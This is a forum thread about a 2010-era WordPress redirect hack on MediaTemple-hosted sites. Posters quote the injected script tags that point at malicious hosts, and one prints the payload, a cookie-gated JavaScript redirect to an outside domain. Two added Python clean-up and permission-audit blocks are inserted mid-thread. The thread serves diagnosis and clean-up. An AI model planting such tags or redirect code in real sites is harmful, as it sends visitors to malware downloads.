Hi,
I looked in one of my pages today and now all of a sudden all my pages and posts have <script src="http://ue.oeaou.com/31"></script> when you view the page in the HTML.
Was my site hacked or was this put in here by a plugin?
I got the same thing. What plugins do you use? Maybe we have some of the same ones.
I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.
Well, I had the same problem. MediaTemple is my hosting provider, and they helped me out with this. This is a WordPress Redirect Exploit hack that puts a line of code in your database tables wp_posts and wp_cats_posts.
The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar:
<script src="http://ae.awaue.com/7"></script>
<script src="http://ue.oeaou.com/31"></script>
<script src="http://ie.eracou.com/3"></script>
<script src="http://ao.euuaw.com/9"></script>
You must delete all of these lines.
Symptoms
* Visitors viewing posts on your blog may be redirected to third-party sites.
* Visitors may also be redirected to qooglesearch.com, which has already been disabled.
Clean-Up
Search in your database (especially in the "wp_posts" and "wp_cats_posts" tables) for strings like these and delete them.
Info taken from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit
I don't know if maybe some plugin is doing this. I have the following plugins, let me know if you have the same or which ones you have:
Adminimize
Akismet
cforms
Cleanup WordPress
Google Analyticator
Google News Sitemap
Google XML Sitemaps
HeadSpace2
Insights
jQuery Lightbox For Native Galleries
MobilePress
Podcasting Plugin by TSG
Post Tabs
Really Simple CAPTCHA
Revision Control
SEO Friendly Images
WordPress.com Stats
WP-PageNavi
WP-UserOnline
WP Geo
ZD YouTube FLV Player
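An added example, not part of any post in this thread: a Python version of the clean-up step above that catches every variant of the injected tag instead of one URL at a time, including the attachment rows mentioned later in the thread. It assumes rows were exported as (id, post_type, content) tuples; `ALLOWED_HOSTS`, `clean_content` and `scan_rows` are names made up here, `www.example.org` is a placeholder, and the sample rows are constructed.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (placeholder value).
ALLOWED_HOSTS = {"www.example.org"}

# An empty external <script src=...></script> tag: the shape of every injected line quoted above.
SCRIPT_TAG = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script>',
    re.IGNORECASE,
)

def clean_content(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (cleaned_html, removed_hosts); off-site script tags are stripped."""
    removed = []

    def _strip(match):
        host = (urlparse(match.group(1)).hostname or "").lower()
        # Relative URLs (no host) and allow-listed hosts are left in place.
        if not host or host in allowed_hosts:
            return match.group(0)
        removed.append(host)
        return ""

    return SCRIPT_TAG.sub(_strip, html), removed

def scan_rows(rows, allowed_hosts=ALLOWED_HOSTS):
    """Return (id, post_type, cleaned_content, removed_hosts) for each row that needs an UPDATE."""
    findings = []
    for row_id, post_type, content in rows:
        cleaned, hosts = clean_content(content, allowed_hosts)
        if hosts:
            findings.append((row_id, post_type, cleaned, hosts))
    return findings

# Constructed sample rows using two of the injected tags quoted in this thread.
SAMPLE_ROWS = [
    (1, "post", '<p>Hello</p><script src="http://ue.oeaou.com/31"></script>'),
    (2, "attachment", 'Photo caption<script src="http://ao.euuaw.com/9"></script>'),
    (3, "page", '<script src="http://www.example.org/js/site.js"></script><p>About</p>'),
    (4, "post", "<p>Clean post</p>"),
]

if __name__ == "__main__":
    for row_id, post_type, cleaned, hosts in scan_rows(SAMPLE_ROWS):
        print(f"row {row_id} ({post_type}): removed script tags from {hosts}")
```

Review the reported hosts before writing the cleaned content back, and re-run the scan afterwards, since posters in this thread report the tags reappearing after a first clean-up.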
Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.
I've noticed the same problem on a few Media Temple WordPress websites this morning. The fix above from Media Temple's site ended up fixing it.
Same problem here today on MediaTemple.
The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.
Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.
Here are the plugins I am using:
Akismet
All in One Favicon
Announcement and Vertical Scroll News
BM Custom Login
Constant Contact API
Kimili Flash Embed
Store Locator
It looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me log in. MediaTemple is working on it, but at this point, I'm thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.
Count me in. Found it on mine too.
And I'm on media temple.
<script src="http://ue.oeaou.com/31"></script>
This redirects people to a "Virus Scan" and asks them to download the "fix"
WOW!
Now I just have a big fat "Error establishing a database connection" on my home page.
I went through the cleanup process as mentioned by mediosia
I'm good to go for now
Seems to be a media temple issue, will sticky this for now.
http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.
fixed here too by removing all mentions via sql, but what a nightmare, esp. if you have a few databases & multiple installs.
On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:
Akismet
WP-Stats
WP-Pagenavi
@iso50 damn, they didn't clean my DBs, just sent me links on how to do it myself & more or less said it's not their problem.
Same again
Also on WordPress hosted by MediaTemple
The only ones I have in common are
Akismet
WP-Stats
Hopefully be able to clean up the database as per mediatemple suggestion...not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!
Akismet is the only common plugin between all of us and since it comes DEFAULT with wordpress I'm not sure we should be blaming it.
Even my obscure blogs that have no traffic going to them with only a default wordpress install got hacked.
The IP addresses are pointing to LATVIA...those damn Latvians.
Anyone have any idea how those Latvians gained access to our MediaTemple accounts?
I'm with Ethan - it looks like the common denominator here is the host - not a plugin.
I have a WP blog hosted with MT - ran the SQL query and I'm clean - for now! (Thanks for the link MrMist!)
I had to double check to make certain this thread wasn't dated BEFORE the big "database clean up" project from last April - when they went in and changed the USER ID and Passwords to improve security.
The $64,000 question is - is my blog "clean" because they updated my DB info or is it just because the hackers haven't found my blog yet?
I agree, I think it is the host. I too run WP on mt and I had the same hack.
I cleaned the site as per the instructions.
A few hours later I checked my site again, and it had the same redirect. I checked the db again and lo - it was hacked again (either that, or the first round cleaning was not successful despite me checking). Cleaned again.
This begs the question. How is this happening? No information is available.
We are not seeing it on other hosts, so I am guessing this is an exploit due to Media Temple's setup. I am guessing the exposure is occurring on the database, not via the WP application.
Cheers,
Entilza
this is NUTS
how can either WP or MT be having this?
Can someone help me understand why it would be MT and not WP, or vice versa?
I pay a lot to MT and it seems they have had these hacking issues more than once.
I'm on MT too, their grid service.
Any of you using vimeo on your site?
I'm using vimeo as flash and as jquery built video (needed to control volume on some of the autoplaying videos)
I don't use Akismet, deleted it, and don't share the same plugins listed in this forum.
that url http://ue.oeaou.com/31 takes me to this script:
function toloveyes(alwayslovers,value,tobelove){
    var exdate=new Date();
    exdate.setDate(exdate.getDate()+tobelove);
    document.cookie=alwayslovers+ "=" +escape(value)+
        ((tobelove==null) ? "" : ";expires="+exdate.toGMTString());
}
function getCookie(alwayslovers){
    if (document.cookie.length>0)
    {
        cstatr=document.cookie.indexOf(alwayslovers + "=");
        if (cstatr!=-1)
        {
            cstatr=cstatr + alwayslovers.length+1;
            olalala=document.cookie.indexOf(";",cstatr);
            if (olalala==-1) olalala=document.cookie.length;
            return unescape(document.cookie.substring(cstatr,olalala));
        }
    }
    return "";
}
var name=getCookie("pma_visited_theme2");
if (name==""){
    toloveyes("pma_visited_theme2","1",20);
    var url="http://e.auoo.info/in2.php?n=508102";
    window.top.location.replace(url);
}else{
}
If you google that pma_visited_theme2 you get this:
http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=pma_visited_theme2
rgbk, it's simple:
If it was a plug-in, or wordpress, or any other common object, then we would be seeing this on other hosts too.
No one is reporting this issue on any other host.
Only Media Temple GS (Grid Service) customers are complaining. I think that pretty clearly points the finger at a vulnerability directly related to that host. Try googling for more info (as I did) and you will find very little info, except pointing to media temple's site, blogs/tweets from media temple users, and this thread.
I suspect customer databases are being manipulated without using wordpress (ie: the exploit is not occurring via wordpress), although I do note with great suspicion that all my wp php files were altered on 31 July. Possibly that was the WP 3.0.1 update though.
Cheers,
Entilza
I have this issue on every single site I look after on MediaTemple GS too. Bummer. Did anyone else notice that their WordPress sites slowed to a CRAWL for a few hours mid-way through last week? My guess is that this is when the attack took place.
Happened to a few folks that run sites on my GS w/ version 2.9 and 3.0.
And the 3.0 uses only the Akismet, Pagebar2, Viper's Video Quicktags, and WP-Walla plugins.
This SQL query helped clean nicely:
UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ao.euuaw.com/9"></script>', ' ');
@entilza72 The hack didn't affect the timestamps of wp-*.php files.
Are you guys getting a response from MT?
I find it shocking that I sent them a support query yesterday and 24 hours later still nothing?
They aren't cheap either. I mean why aren't they jumping on this issue? I sent them this forum discussion and everything.
Btw I didn't update to 3.01.
Hi,
There have been many similar problems on MediaTemple lately. Can you check permissions of wp-config.php and report them here?
This file contains MySQL passwords in clear text and should not be world-readable. Otherwise, anyone from neighbor accounts can gain access to your WordPress database and modify it however they want to.
also using mediatemple grid server, we are in Spain at the moment, maybe people can report their geographic location, I doubt that matters, but you never know.
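An added example, not part of the post above: a Python audit that walks a hosting account, finds every wp-config.php (several posters run multiple installs) and reports the ones that group or other users can access. `audit_wp_configs` and `demo` are names made up here, the demo tree is constructed, and tightening to owner-only access assumes PHP runs as the file's owner.

```python
import os
import stat
import tempfile

def audit_wp_configs(root, fix=False):
    """Return [(path, octal_mode)] for each wp-config.php under root that
    grants any access to group or other users. With fix=True, those
    permission bits are removed and only the owner's bits are kept."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "wp-config.php" not in files:
            continue
        path = os.path.join(dirpath, "wp-config.php")
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & 0o077:  # any group/other read, write or execute bit
            findings.append((path, oct(mode)))
            if fix:
                # Assumption: PHP runs as the file owner, so owner-only access is enough.
                os.chmod(path, mode & 0o700)
    return findings

def demo():
    """Build a constructed two-install tree, audit and fix it, then audit again."""
    with tempfile.TemporaryDirectory() as root:
        for name, mode in (("blog-a", 0o644), ("blog-b", 0o600)):
            os.makedirs(os.path.join(root, name))
            path = os.path.join(root, name, "wp-config.php")
            with open(path, "w") as fh:
                fh.write("<?php // constructed placeholder, no real credentials\n")
            os.chmod(path, mode)
        before = audit_wp_configs(root, fix=True)
        after = audit_wp_configs(root)
        return [(os.path.relpath(p, root), m) for p, m in before], after

if __name__ == "__main__":
    before, after = demo()
    print("exposed before fix:", before)
    print("exposed after fix: ", after)
```

If the database was already modified, tightening the file mode does not invalidate a password that was already read; changing the database password in wp-config.php is a separate step.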
@UseShots - mine was world read. Not good practice, but I believe these servers are jailed and it is not possible for a user to cd into your file structure, or read a file if they know where it is. I have changed to my local user rw (rw---- or 500) just in case.
@rgbk - it occurred with my 3.0.1 site. I logged a job over 24 hrs ago. The official line over a day ago was this was a WordPress exploit, not an mt problem. Clearly, that is incorrect.
@khawkins98 - yeah, I figure I updated to 3.0.1 on that date.
@traversal - my mt wp site has been crawling since day one. Often can take up to 10 seconds to begin serving. Strangely, non-wp content can begin serving in around 2 seconds.
This topic has been closed to new replies.